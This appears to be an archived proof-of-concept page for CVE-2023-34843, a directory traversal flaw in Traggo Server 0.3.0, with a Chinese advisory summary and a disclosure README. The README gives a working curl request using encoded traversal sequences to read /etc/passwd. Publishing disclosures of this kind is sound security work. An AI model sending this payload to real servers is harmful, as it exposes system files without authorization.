Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-34843 PoC — Traggo Server 路径遍历漏洞

Source
Associated Vulnerability
Title:Traggo Server 路径遍历漏洞 (CVE-2023-34843)
Description:Traggo Server是Traggo开源的一个基于标签的时间跟踪工具。 Traggo Server 0.3.0版本存在安全漏洞,该漏洞源于容易受到精心设计的GET请求的目录遍历攻击。
Description
Public disclosure for CVE-2023-34843.
Readme
CVE-2023-34843 Disclosure 

traggo/server version 0.3.0 is vulnerable to directory traversal. 


Steps to reproduce:

1. Setup traggo/server on your endpoint/server. 
https://traggo.net/install/

2. Make a GET request to the following URL. 
curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd

3. View contents of /etc/passwd
File Snapshot

[4.0K] /data/pocs/179bc8b2919d779fbae793e9ebb496a789f59774 └── [ 346] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.